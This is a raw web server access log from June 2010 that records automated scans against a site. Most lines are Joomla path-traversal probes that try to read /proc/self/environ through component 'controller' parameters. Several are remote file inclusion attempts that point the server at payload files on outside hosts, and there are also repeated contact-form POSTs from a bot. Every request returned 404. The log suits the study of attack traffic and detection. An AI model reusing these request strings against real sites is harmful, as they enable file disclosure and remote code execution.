213.165.85.241 - - [27/Jun/2010:08:57:50 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:57:50 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:57:50 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
206.71.53.4 - - [27/Jun/2010:08:58:01 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:58:01 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:58:01 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.228.107.2 - - [27/Jun/2010:08:58:10 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:58:10 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:58:10 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
213.165.85.241 - - [27/Jun/2010:08:58:11 -0500] "GET /logs/access_log.1275868800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:58:11 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:58:11 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:58:16 -0500] "GET /logs/access_log.1275264000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.228.107.2 - - [27/Jun/2010:08:58:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
213.165.85.241 - - [27/Jun/2010:08:58:42 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:58:42 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:58:42 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
218.111.128.237 - - [27/Jun/2010:08:58:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
218.111.128.237 - - [27/Jun/2010:08:58:57 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
218.111.128.237 - - [27/Jun/2010:08:58:58 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
213.165.85.241 - - [27/Jun/2010:08:59:09 -0500] "GET /logs/access_log.1275264000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
206.71.53.4 - - [27/Jun/2010:08:59:13 -0500] "GET /logs/access_log.1276819200//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:59:13 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:59:13 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:59:18 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
218.111.128.237 - - [27/Jun/2010:08:59:35 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
213.165.85.241 - - [27/Jun/2010:08:59:59 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:59:59 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:59:59 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:00:22 -0500] "GET /logs/access_log.1275264000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:01:23 -0500] "GET /logs/access_log.1275264000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
206.71.53.4 - - [27/Jun/2010:09:01:43 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:09:01:52 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
213.165.85.241 - - [27/Jun/2010:09:05:43 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:05:43 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:05:43 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:05:50 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:05:51 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:05:51 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:05:59 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:05:59 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:05:59 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [27/Jun/2010:09:10:56 -0500] "GET /?S=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.124.120.29 - - [27/Jun/2010:09:13:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:13:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:13:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:13:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:13:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:13:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:13:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:13:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:13:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.165.85.241 - - [27/Jun/2010:09:14:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:14:32 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:14:32 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.124.120.29 - - [27/Jun/2010:09:14:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:14:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:14:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:14:44 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:14:44 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:14:44 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:14:44 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:14:44 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.29 - - [27/Jun/2010:09:14:44 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
213.165.85.241 - - [27/Jun/2010:09:16:14 -0500] "GET /logs/access_log.1276041600//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:18:42 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:18:43 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:18:43 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:23:59 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:23:59 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:00 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:09 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:11 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:11 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:12 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:19 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:23 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:23 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:29 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:34 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:34 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:34 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:49 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:49 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:49 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:50 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:50 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:24:50 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.16.100.218 - - [27/Jun/2010:09:25:00 -0500] "GET /errors.php?error=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
83.16.100.218 - - [27/Jun/2010:09:25:00 -0500] "GET /logs/errors.php?error=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
83.16.100.218 - - [27/Jun/2010:09:25:00 -0500] "GET /logs/access_log.1266710400%20%20/errors.php?error=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.165.85.241 - - [27/Jun/2010:09:25:41 -0500] "GET /logs/access_log.1275264000//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:25:45 -0500] "GET /logs/access_log.1275696000//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:25:45 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:25:46 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:25:46 -0500] "GET /logs/access_log.1276041600//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:26:24 -0500] "GET /logs/access_log.1275264000//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:26:32 -0500] "GET /logs/access_log.1275868800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:26:57 -0500] "GET /logs/access_log.1275868800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.195.240 - - [27/Jun/2010:09:30:10 -0500] "GET /logs/access_log.1166745600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.165.85.241 - - [27/Jun/2010:09:31:15 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [27/Jun/2010:09:31:59 -0500] "GET /logs/access_log.1268092800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.28 - - [27/Jun/2010:09:32:00 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
77.221.130.28 - - [27/Jun/2010:09:32:00 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.130.28 - - [27/Jun/2010:09:32:01 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
67.228.107.2 - - [27/Jun/2010:09:32:02 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:09:32:04 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
201.116.197.150 - - [27/Jun/2010:09:32:31 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.228.107.2 - - [27/Jun/2010:09:32:54 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:09:32:55 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:09:32:55 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
201.116.197.150 - - [27/Jun/2010:09:33:00 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.228.107.2 - - [27/Jun/2010:09:33:14 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:09:33:29 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:09:33:29 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:09:33:29 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
213.165.85.241 - - [27/Jun/2010:09:33:31 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:33:31 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:33:32 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.228.107.2 - - [27/Jun/2010:09:33:41 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
201.116.197.150 - - [27/Jun/2010:09:35:05 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
201.116.197.150 - - [27/Jun/2010:09:35:06 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
201.116.197.150 - - [27/Jun/2010:09:35:06 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
201.116.197.150 - - [27/Jun/2010:09:35:11 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
213.165.85.241 - - [27/Jun/2010:09:35:16 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:35:17 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:35:17 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:35:34 -0500] "GET /logs/access_log.1275264000//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
83.16.100.218 - - [27/Jun/2010:09:36:14 -0500] "GET /logs/access_log.1266710400/errors.php?error=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
24.162.136.251 - - [27/Jun/2010:09:36:49 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
74.55.41.132 - - [27/Jun/2010:09:37:23 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:09:37:25 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.229.45.142 - - [27/Jun/2010:09:38:12 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:09:38:12 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:09:38:12 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:09:38:13 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:09:38:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:09:38:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:09:38:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:09:38:13 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:09:38:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
213.165.85.241 - - [27/Jun/2010:09:38:23 -0500] "GET /logs/access_log.1276041600//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:38:36 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:38:59 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:38:59 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
